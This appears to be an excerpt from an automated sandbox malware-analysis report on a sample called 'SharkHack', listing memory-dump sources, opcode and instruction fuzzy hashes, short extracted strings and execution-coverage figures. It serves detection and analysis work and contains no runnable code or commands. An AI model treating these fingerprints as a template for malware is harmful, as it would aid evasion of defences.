                                                                                                          • Instruction ID: 513a0d928efd24efb999ea22af01681742389054828891ec8d9ae398d23a8230
                                                                                                          • Opcode Fuzzy Hash: b9c3bd6e63cc662b013c880d6b04e948d51676fdb0b304580726a67d8868cfe3
                                                                                                          • Instruction Fuzzy Hash: EFF0C271408340AEE7218A1ADC84B66FFA8EF40338F18C45AED1C0E686C379A844CAB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a08f8e89635c6191c0d02d31f0caa6a8baff6c6e3dc7cd84731e10c01f570b1f
                                                                                                          • Instruction ID: 6d0fb977f15a9022bdb8170b16f11ae9a2f823dd098372f1039c014e3bdbc770
                                                                                                          • Opcode Fuzzy Hash: a08f8e89635c6191c0d02d31f0caa6a8baff6c6e3dc7cd84731e10c01f570b1f
                                                                                                          • Instruction Fuzzy Hash: 4BE065363495405FC7158619EC94D95FFA5EFCA23071540A7F949CB762C5319C1AC660
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bee97aed1ea2f120bb9849ec220f84c891ef05ad6eafb2d3e6fc953ac1348850
                                                                                                          • Instruction ID: ce09fb6194332fcf1d57e5524a5e4f87c9e5cea6966d0abb7a9a7fca916e76c5
                                                                                                          • Opcode Fuzzy Hash: bee97aed1ea2f120bb9849ec220f84c891ef05ad6eafb2d3e6fc953ac1348850
                                                                                                          • Instruction Fuzzy Hash: CDE092717002186FD3049B5EDC80E6BFBEEFFD9A20B21807AF545D7360CAB0AC0086A4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 127b290c199ddb9e79e85e71259860f7793ff4afc3784ab8d56800eee06ab797
                                                                                                          • Instruction ID: a2a84daa0ae2b2a770019d8de4d5abbff7646c4b6dbb0a0876dd33b511863041
                                                                                                          • Opcode Fuzzy Hash: 127b290c199ddb9e79e85e71259860f7793ff4afc3784ab8d56800eee06ab797
                                                                                                          • Instruction Fuzzy Hash: 0CE0E35599E3D00FC713977459AA0987FB0AD0312071A84CBD994CF4B3DA68485EC363
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e96887060e85d7d14b88bd184f355d0728fade1ab18192c0c370aeed1972c9be
                                                                                                          • Instruction ID: dea2c75748c1f245ddd071766d804ab8f07b72a6abb7220b901689968c8cbe5e
                                                                                                          • Opcode Fuzzy Hash: e96887060e85d7d14b88bd184f355d0728fade1ab18192c0c370aeed1972c9be
                                                                                                          • Instruction Fuzzy Hash: 8CE0EC363045146FC3149A4EEC88D46FBEDEFD9771B55806AFA09C7361CA71AC05CAA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b9db0bac69f66d717d041f8d539e26c384620f27b7c607c94e3327d36ca05dd5
                                                                                                          • Instruction ID: a5c31f2771c2f5b2f95e59adbfec62e201aafb76c7f47e8322ae5577bce69065
                                                                                                          • Opcode Fuzzy Hash: b9db0bac69f66d717d041f8d539e26c384620f27b7c607c94e3327d36ca05dd5
                                                                                                          • Instruction Fuzzy Hash: 7EE01AB67422008FC744EF38F9984187BE1FF4921A31545E9E80ACB332DB359C21CB50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                                                                          • API String ID: 0-3076519024
                                                                                                          • Opcode ID: 096e19d9cd4a1cb3acb7ac297f1266138185858c63eacc7a9608158291754a68
                                                                                                          • Instruction ID: dc44e1c9299be84c66d18970ef5fafffdd68bf87a542444a70183407c84008be
                                                                                                          • Opcode Fuzzy Hash: 096e19d9cd4a1cb3acb7ac297f1266138185858c63eacc7a9608158291754a68
                                                                                                          • Instruction Fuzzy Hash: 3072CD31B406448FCB54EB78C89466E7BA6BFC8311F248569E14ADB3A6CF34DC46C791
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #HBF$A{]z$w*S$}\%G
                                                                                                          • API String ID: 0-2096210196
                                                                                                          • Opcode ID: 367dc34e83d21e02cca18788a3ef8c9c8ce7c365436c536f23bcabc679e97fda
                                                                                                          • Instruction ID: 7572e43840d8b47f423f2091b528d72b99f2a8a535ceb2cf5c34897e307380f3
                                                                                                          • Opcode Fuzzy Hash: 367dc34e83d21e02cca18788a3ef8c9c8ce7c365436c536f23bcabc679e97fda
                                                                                                          • Instruction Fuzzy Hash: DCC12474E0520ADFCB04DFA9C5809EEFBF2FB88311F24952AD415BB214D335AA418B66
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$@
                                                                                                          • API String ID: 0-1615930675
                                                                                                          • Opcode ID: 57dc1c0f318dfb1105eb9372d3e69a759b3acffb3a22e516a633826b6c84dd97
                                                                                                          • Instruction ID: c7e3374e33a9ee8560479ce95abd9d341a200442a2099c73ef7c0389bf5aa747
                                                                                                          • Opcode Fuzzy Hash: 57dc1c0f318dfb1105eb9372d3e69a759b3acffb3a22e516a633826b6c84dd97
                                                                                                          • Instruction Fuzzy Hash: 42612AB0E0120ADFCB04DFAAC5916EEFBB2BF88301F14941AD425B7244D7359A81CF99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$@
                                                                                                          • API String ID: 0-1615930675
                                                                                                          • Opcode ID: 5b596c23a983cb42cdedf303862b214fc0c1e1cf49d8993bae3b1acb93254cfe
                                                                                                          • Instruction ID: 4ee2bf1477e8996c3b2e00775a5ddddfddcc361fea5bc9dfb3bc9abc1b948418
                                                                                                          • Opcode Fuzzy Hash: 5b596c23a983cb42cdedf303862b214fc0c1e1cf49d8993bae3b1acb93254cfe
                                                                                                          • Instruction Fuzzy Hash: 5B513C70E0120ADFCB04DFA9C5915EEFBB2BF88301F15C56AD429A7244D7359A81CF99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q$PH^q
                                                                                                          • API String ID: 0-1598597984
• Opcode ID: e8934f06159be5c633b66bdbf7b263706ded4da1f3de3ee2cacf9a41d573b23f
• Instruction ID: 2e8162854cb2cbad1059ede7b75fefeb704062648ce29b9da0eb547dc2211b94
• Opcode Fuzzy Hash: e8934f06159be5c633b66bdbf7b263706ded4da1f3de3ee2cacf9a41d573b23f
• Instruction Fuzzy Hash: AFD1A634A006088FDB14DF69D598EA9B7F6BF4D701F2680A9E406EB361DB31AD41CF60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2851633688.0000000001F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1f90000_SharkHack.jbxd
Similarity
• API ID:
• String ID: Xbq$$^q
• API String ID: 0-1593437937
• Opcode ID: a76fec9dc8c9f1cfd9bd37978d4e4df58a301ec39dd574c18bf9fab2c9b297ef
• Instruction ID: 096907f3c1fa1f52ad880097f6454339a1b0bd696e3d9c6050b43aad772b5d7f
• Opcode Fuzzy Hash: a76fec9dc8c9f1cfd9bd37978d4e4df58a301ec39dd574c18bf9fab2c9b297ef
• Instruction Fuzzy Hash: AA91B575F002189BEF18EB7A945467E7BB7BFC9740B08892DE446E7398CE3589028791
Strings
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: 4|cq$Y|?
• API String ID: 0-2893176855
• Opcode ID: ff2e081bcf410a35fcf09658ed1d8508cb4a0be1337ec0dc2a1bc037665484ca
• Instruction ID: edf58446baa8959ba16f23322a42b10e919e6ca509cb2179007b960ec53c8f96
• Opcode Fuzzy Hash: ff2e081bcf410a35fcf09658ed1d8508cb4a0be1337ec0dc2a1bc037665484ca
• Instruction Fuzzy Hash: F98119B1E052198BEB58CF6AC850B9DFBB2BF88300F14C5AAD509A7354EB345A85CF51
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: #HBF$#HBF
• API String ID: 0-136798975
• Opcode ID: 54e893b74f0b73716fb5d73b72c09d3a4a8d2a37ced8fd6ed91f8422d6c29b88
• Instruction ID: 5d588448d5e52605640eef7f1a233b7192baf6ac9a0b40928dc974024a7d09fa
• Opcode Fuzzy Hash: 54e893b74f0b73716fb5d73b72c09d3a4a8d2a37ced8fd6ed91f8422d6c29b88
• Instruction Fuzzy Hash: 3C61F374E15609DFCB08CFA9C5845EEFBF2FF88211F25942AD415BB214D731AA018B66
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: A{]z$}\%G
• API String ID: 0-4271377017
• Opcode ID: 9132ad4ce16e606bdeb38624c0f68402c0b72363d973b69f43be8e618724b055
• Instruction ID: e15e826a7ebf4233953f9199dfbeaac35c151998771b46469fe0bd7e3e3a8748
• Opcode Fuzzy Hash: 9132ad4ce16e606bdeb38624c0f68402c0b72363d973b69f43be8e618724b055
• Instruction Fuzzy Hash: A6412E70E0420ADFDB04DFAAC4805EEFBF2BF89311F24D56AC415A7254E335A6428F55
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: A{]z$}\%G
• API String ID: 0-4271377017
• Opcode ID: 92788ab2f6499621cbcf55aadbde662ae3fd112867d3973b391c0c9b0f215926
• Instruction ID: 25b0d7be64dff6c983b31dea7629c21e4636efcfca48a0630ff96b6a10c56ccf
• Opcode Fuzzy Hash: 92788ab2f6499621cbcf55aadbde662ae3fd112867d3973b391c0c9b0f215926
• Instruction Fuzzy Hash: 5441ECB0E0420ADFDB44DFAAC4805AEFBF2BF88311F24D52AC415B7254E775A6418F95
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: yS^Z
• API String ID: 0-4128205011
• Opcode ID: 8883b416a7b7e43e6da260ae127e9006faa87f731736326dec511fbe3e6f3c9e
• Instruction ID: 3e0e65ff3f01bbc40a675382f9323b3ce51f190655dd94086440027578493fe4
• Opcode Fuzzy Hash: 8883b416a7b7e43e6da260ae127e9006faa87f731736326dec511fbe3e6f3c9e
• Instruction Fuzzy Hash: 7771F2B4E0420ADFCB44DF99C5809AEFFB2FF88311F14955AD415AB214C731A982CF9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: yS^Z
• API String ID: 0-4128205011
• Opcode ID: 43ca03d1c4bc3dee06dcd4c459ee1cacf81f2f07de847daa60832227fd03cc61
• Instruction ID: f1227fb0f1148db28311b600da149f24f26331b9e94fc1fe8b5ea912f7d8146f
• Opcode Fuzzy Hash: 43ca03d1c4bc3dee06dcd4c459ee1cacf81f2f07de847daa60832227fd03cc61
• Instruction Fuzzy Hash: 9F61F1B4E0020ADFCB04DFA9C4949AEFFB2BF88311F14951AD425A7310D731A982CF99
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c58454561fc252490f5e66b8af6e15c2861e7508ddfb32496d03bf35310d3f36
• Instruction ID: e1c179ab7a2e8dae0106eda4de232154212b60d7c4d3f2eb4cc492ca52ae3693
• Opcode Fuzzy Hash: c58454561fc252490f5e66b8af6e15c2861e7508ddfb32496d03bf35310d3f36
• Instruction Fuzzy Hash: 6132AC35B012048FDB15DF69C594BAEB7FABF89700F1484A9E14A9B3A0CB75EC01CB61
Memory Dump Source
• Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e78a5628e0cd5262acd0e0e151a3fd54f0f422603575e1cdfef678121973240
• Instruction ID: 502252215e829ff8c42ec957a72ae570338a4909b781d20add1fe7b036742a25
• Opcode Fuzzy Hash: 2e78a5628e0cd5262acd0e0e151a3fd54f0f422603575e1cdfef678121973240
• Instruction Fuzzy Hash: 8BC1AE35B007048FDB26DF75C554BAEB7FAAF89700F14846DD28A9B290CB75E901CB61
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cdbc37fc17a7dd86b37aab4e4e3c564bba19017c97066b04740e0b7bec67328f
• Instruction ID: e9696d296ec1061917e598f510ed717f73dfb005e5f1ea6e2062d8da2b607cf5
• Opcode Fuzzy Hash: cdbc37fc17a7dd86b37aab4e4e3c564bba19017c97066b04740e0b7bec67328f
• Instruction Fuzzy Hash: 48D10835C2075A8ACB50EF64D990A9DB7B1FF95300F50879AD1493B221FBB06EC9CB91
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac5ebfaad73796794acf3acf8edc01c9801c00ab4a40c2e70a54bfde8074e689
• Instruction ID: 138662707cd14a99890496301941cdc598fc5d5b8e33cdd8f536465f0d787593
• Opcode Fuzzy Hash: ac5ebfaad73796794acf3acf8edc01c9801c00ab4a40c2e70a54bfde8074e689
• Instruction Fuzzy Hash: E1B14470E15219CFDF48DFA5D98469EFBB2FB89301F20992AC40ABB254D7359901CF29
Memory Dump Source
• Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4644ac6cabb2a5b1c91ce5867f2723e6cad93e9732c4efc764dd2e8942c000cb
• Instruction ID: f187acec82fd622948b8d69670b985cc5aedad99ddf13e33823718eb3a38a598
• Opcode Fuzzy Hash: 4644ac6cabb2a5b1c91ce5867f2723e6cad93e9732c4efc764dd2e8942c000cb
• Instruction Fuzzy Hash: 41D1D835C2075A8ACB54EF64D990A9DB7B1FF95300F50879AD1493B220FBB06EC9CB91
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b45c33c8951a5988556b9800768bd4afd825b30e9c6cddccb54f0164ca36a5b8
• Instruction ID: d400d1fd2f9ee0b0bd656705c8e7742623d6b04e229a220d7ae266066fb8091f
• Opcode Fuzzy Hash: b45c33c8951a5988556b9800768bd4afd825b30e9c6cddccb54f0164ca36a5b8
• Instruction Fuzzy Hash: F1A16B70E15219DFCB14DFA9C580AAEFBB2FB88301F24D1A9E409A7255DB319E41CF61
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51dea3a2c6b1e3a3b248674f89cfe0ef9e50ab1a91d0c0cfd27ebd56319129cc
• Instruction ID: 9344faf4e895b996bdd309544564a36a59becac76c6fe842913478f686c0e923
• Opcode Fuzzy Hash: 51dea3a2c6b1e3a3b248674f89cfe0ef9e50ab1a91d0c0cfd27ebd56319129cc
• Instruction Fuzzy Hash: A6719CB1D012548BDF1ACF2BD884299BFB3AFC5314F18C0AED408AA226DBB50995DF11
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbc7163cdd4c04dae4b7803d9adb142678280439a92303a1a2a0e55ff5e37228
• Instruction ID: 8eb8b98437fabd243bc8901602d5178a04616605dce48a242dafea31d973f67a
• Opcode Fuzzy Hash: dbc7163cdd4c04dae4b7803d9adb142678280439a92303a1a2a0e55ff5e37228
• Instruction Fuzzy Hash: E9815970E012198FCB14DFA9D980A9EBBB2FF89305F24D5AAE409A7215DB309A41CF51
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c055aa8f2b1d88fe5bb2e41813559efa379860c31d6710e15a302bc71c02dc4e
• Instruction ID: 3935ea3c912decdf98066d12287e10fc1b2d70559f2cbb5038b519667fcf91e9
• Opcode Fuzzy Hash: c055aa8f2b1d88fe5bb2e41813559efa379860c31d6710e15a302bc71c02dc4e
• Instruction Fuzzy Hash: 11710434E121099FCB44CFA9D58499EFBF1FF88311F14896AE419AB320D731AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3be0c7a949d29e4d07fbc44562fd537be190cff29812bb73ebc39cfd1820adab
• Instruction ID: cd6db6667f484f678710f36a487a709bbb5e3f7694625e06e48f9fd5a9f8fc6d
• Opcode Fuzzy Hash: 3be0c7a949d29e4d07fbc44562fd537be190cff29812bb73ebc39cfd1820adab
• Instruction Fuzzy Hash: 72710334E121099FCB08CF99D58099EFBF1FF88311F14896AE419AB320D730AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70f42b13da314a8bb96db66aa22e8f79516cad8f0cbe58da145c27a95087ac13
• Instruction ID: 5c2db807e3c8f3ce3831444aeaa70b26ebf70fa471258cb2a3fc87ce76b45ad4
• Opcode Fuzzy Hash: 70f42b13da314a8bb96db66aa22e8f79516cad8f0cbe58da145c27a95087ac13
• Instruction Fuzzy Hash: 02516970E011198BCB14DFAAC9806AEFBF2FB88301F24D56AD409A7205DB319A42CF61
Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0451b2ee2a5ba5d79842cf20b92f1ec296d86cd659a218825d8413700c0289a9
                                                                                                          • Instruction ID: 84b9dbf06624fc2a245c332e7044703382d0746f6d757e868d9e515f008fd6ff
                                                                                                          • Opcode Fuzzy Hash: 0451b2ee2a5ba5d79842cf20b92f1ec296d86cd659a218825d8413700c0289a9
                                                                                                          • Instruction Fuzzy Hash: F05159B1E016188BDB68DF6B894479EFBF7BFC8301F14C1BA950CA6214EB701A858F11
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e91cb873128310a7c9ecb12779f64a6e5f83523a0717244685e72598ed2f429b
                                                                                                          • Instruction ID: acc4c963734e02e4b056b7a394c3d4a51f8e567d48eaec2b9434876390a92c8a
                                                                                                          • Opcode Fuzzy Hash: e91cb873128310a7c9ecb12779f64a6e5f83523a0717244685e72598ed2f429b
                                                                                                          • Instruction Fuzzy Hash: D741F4B1E016188BEB58CFAAD89479EFAF2AF88304F14C06AD508A7355EF741945CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c7c989a16086390a02f4eb005f9eb765ec993cd97ea43aafb226815cef4b6116
                                                                                                          • Instruction ID: 9d04938f08bf7126eb0c1f4b6fb5f753d70295d306ed5e35699d663fa4ffbad9
                                                                                                          • Opcode Fuzzy Hash: c7c989a16086390a02f4eb005f9eb765ec993cd97ea43aafb226815cef4b6116
                                                                                                          • Instruction Fuzzy Hash: B34127B4E0160ADFCB04DFAAD5815AEFBF2BF88300F25C46AD405B7254D731AA41CB95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c4c68dd24ee43f42f09b18dad1ecfbe8c9e489003854525871a4a36f48b42952
                                                                                                          • Instruction ID: 8ddaac3686895a614ddccd8afb4540815f8e7e32b9c1f4d7d6365dc9056bce59
                                                                                                          • Opcode Fuzzy Hash: c4c68dd24ee43f42f09b18dad1ecfbe8c9e489003854525871a4a36f48b42952
                                                                                                          • Instruction Fuzzy Hash: A341D5B4E0160ADFCB04DFAAC5805AEFBF2BF88301F25C56AD409B7354D735AA418B95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e78ef951a4c6f5d39f1b740f47a7fd5b468f2ccbd5e41368c72f3bdf955bb3ab
                                                                                                          • Instruction ID: 4e0f27824cc01c8ad903f86f348e7d03c8baf9a669a5850cc10f19183e4b2606
                                                                                                          • Opcode Fuzzy Hash: e78ef951a4c6f5d39f1b740f47a7fd5b468f2ccbd5e41368c72f3bdf955bb3ab
                                                                                                          • Instruction Fuzzy Hash: 2321EA71E056588BEB58CFAB9C406DEFAF3AFC8200F18C07AC858A6254DB340645CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 32bc950052c3f12b2884605224141132f27fb40ca59aa052a5642cec11cd33fd
                                                                                                          • Instruction ID: 377a12c39481630b4cbecf7281889e1becf8c8c416b610f137c11ce80cd605e3
                                                                                                          • Opcode Fuzzy Hash: 32bc950052c3f12b2884605224141132f27fb40ca59aa052a5642cec11cd33fd
                                                                                                          • Instruction Fuzzy Hash: 06113A70E116198FDB09CF6BD8405AEBEF7AFC8301F14C07AD408A7255EA314946CB52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb6f595f8d37a616e45f60f9e774b530cd23a68dc83724657d678a5fa2179d6d
                                                                                                          • Instruction ID: 336d8a158df8e0392c250fde82e04ef76e225542a5b5d17ef047a4b91f31d748
                                                                                                          • Opcode Fuzzy Hash: cb6f595f8d37a616e45f60f9e774b530cd23a68dc83724657d678a5fa2179d6d
                                                                                                          • Instruction Fuzzy Hash: 8A11DD71E056189BEB18CF6BDC4469EFAF3AFC8200F04C07AD818A6254DB7415458F55

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:22.6%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
